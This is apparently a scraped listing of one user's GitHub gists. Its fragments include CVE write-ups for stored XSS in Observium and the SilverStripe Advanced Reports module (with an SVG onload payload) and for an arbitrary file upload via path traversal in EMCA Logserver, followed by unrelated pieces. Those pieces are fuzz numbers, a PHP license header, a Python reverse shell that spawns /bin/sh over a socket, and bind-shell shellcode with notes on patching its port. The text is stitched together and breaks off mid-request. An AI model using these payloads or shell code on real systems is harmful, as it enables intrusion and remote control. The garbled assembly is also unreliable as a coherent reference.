Maciej Domanski ahpaleus

ahpaleus / CVE-2020-25140.txt
Last active September 22, 2020 09:13
CVE-2020-25140 - Cross-Site Scripting (Observium)
CVE - CVE-2020-25140
------------------------------------------
Cross Site Scripting in contacts
------------------------------------------
[Description]
A penetration test has shown that the application is vulnerable to Cross-Site Scripting (XSS): malicious JavaScript code can be injected into the application and is stored by it.
------------------------------------------
[Additional Information]
ahpaleus / CVE-2020-25102.txt
Created September 3, 2020 14:43
CVE-2020-25102 - Cross Site Scripting (XSS) - SilverStripe Advanced Reports Module
SilverStripe Advanced Reports Module (aka silverstripe-advancedreports) 1.0 through 2.0 is vulnerable to Cross-Site Scripting (XSS) because malicious JavaScript code can be injected into the module and is stored by it. This affects admin/advanced-reports/DataObjectReport/EditForm/field/DataObjectReport/item (aka report preview) when an SVG document is provided in the Description parameter.
To exploit the vulnerability, an attacker has to send a malicious request that stores the JavaScript payload in the application.
Request to the server:
Request (with the <svg onx=() onload=(confirm)(1) payload in the Description parameter)
GET /admin/advanced-reports/DataObjectReport/EditForm/field/DataObjectReport/item/4054/ItemEditForm?action_reportpreview=1&
"0.1111"
"-1.97684995314e+16"
"1.79769313486e+308"
"3.38800266804e+16"
"-1.97684995314e+16"
"-128"
"-129"
"-139333426276771806651771"
"-2147483648"
"-2147483649"
/*
+----------------------------------------------------------------------+
| PHP Version 7 |
+----------------------------------------------------------------------+
| Copyright (c) The PHP Group |
+----------------------------------------------------------------------+
| This source file is subject to version 3.01 of the PHP license, |
| that is bundled with this package in the file LICENSE, and is |
| available through the world-wide-web at the following url: |
| http://www.php.net/license/3_01.txt |
CVE-2019-14521 - Arbitrary File Upload
The Logo File upload feature in EMCA Energy Logserver 6.1.2 allows attackers to send any kind of file to any location on the server via path traversal in the filename parameter.
To exploit the vulnerability, an attacker changes the "filename" parameter and puts malicious content into the uploaded file (for example, a reverse shell in Node.js). Path traversal in the filename lets the attacker place the file anywhere on the server.
Request to the server:
POST /api/admin/logoupload HTTP/1.1
Host: XXXXXXXXXXX
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0
import sys
import socket
import binascii
import os

# Check the argument count before reading sys.argv[2]; otherwise a missing
# argument raises IndexError instead of printing the usage message.
# The original used Python 2 print and "is not 3"; "is" must not be used
# for integer comparison.
if len(sys.argv) != 3 or not sys.argv[2].isdigit() or not 1 <= int(sys.argv[2]) <= 65535:
    print("Usage: {0} IP PORT (1-65535)".format(sys.argv[0]))
    sys.exit(1)
ip = sys.argv[1]
port = sys.argv[2]
global _start
section .text
_start:
xor eax, eax
xor ebx, ebx
xor ecx, ecx
xor edx, edx
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("127.0.0.1",1337))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
d = bytearray(open("bind_socket_loop", "rb").read())
d[0x7d] = 0xab
d[0x7e] = 0xcd
open("bind_socket_loop_wrapped", "wb").write(d)
'''
\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc6\x66\xb8\x69\x01\x89\xf3\x52\x66\x68\x00\x80\x66\x6a\x02\x89\xe1\xb2\x10\xcd\x80\x66\xb8\x6b\x01\x89\xf3\x31\xc9\xcd\x80\x56\x66\xb8\x6c\x01\x31\xf6\xcd\x80\x5e\xb1\x04\xfe\xc9\xb0\x3f\xb3\x04\xcd\x80\x75\xf6\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80\xb8\x01\x00\x00\x00\xbb\x05\x00\x00\x00\xcd\x80
We need to find:
\x00\x80
and set the port there (positions 30 and 31)
; 0x0080 (80): we insert 8000 instead
'''